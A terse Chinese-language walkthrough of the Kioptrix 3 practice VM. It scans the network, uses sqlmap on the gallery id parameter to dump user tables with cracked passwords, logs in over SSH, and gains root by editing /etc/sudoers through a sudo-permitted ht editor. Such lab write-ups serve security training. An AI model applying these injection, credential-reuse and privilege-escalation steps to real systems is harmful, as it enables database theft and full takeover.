信息收集
sudo arp-scan -l
nmap -sS -A 192.168.0.159
目标靶机开放了80端口http访问,浏览器访问查看
使用dirb进行目录枚举
网站探测
根据页面提示,点击 blog ,得到线索
http://kioptrix3.com/gallery
host 绑定,将网站域名绑定与 192.168.0.159 绑定
C:\windows\system32\drivers\etc\hosts
在host文件里添加然后访问
SQL注入利用
发现 url 中含 id 参数,sqlmap 测试SQL注入,存在
python sqlmap.py -u "http://192.168.0.159/gallery/gallery.php?id=1" --batch --dbs # 查询数据库名
python sqlmap.py -u "http://192.168.0.159/gallery/gallery.php?id=1" --batch -D gallery --tables # 查询gallery库下数据表
python sqlmap.py -u "http://192.168.0.159/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump 查询 user 表下用户
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)
getshell
尝试另两组用户名密码,发现可通过 ssh 远程连接
ssh [email protected] # kali直接连接会报错
需要凭证
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
提权
发现 loneferret 用户存在利用点
cat /etc/passwd
查看用户家目录
ls
cat CompanyPolicy.README
sudo -l
sudo /usr/local/bin/ht
ht编辑器修改:
export TERM=xterm
sudo /usr/local/bin/ht
按 F3 键搜索文件中的 " /etc/sudoers" 单词
按 F2 键将以下行添加到文件中:/bin/bash
F2 保存 --> F10 退出
sudo /bin/bash
id
whoami
提权成功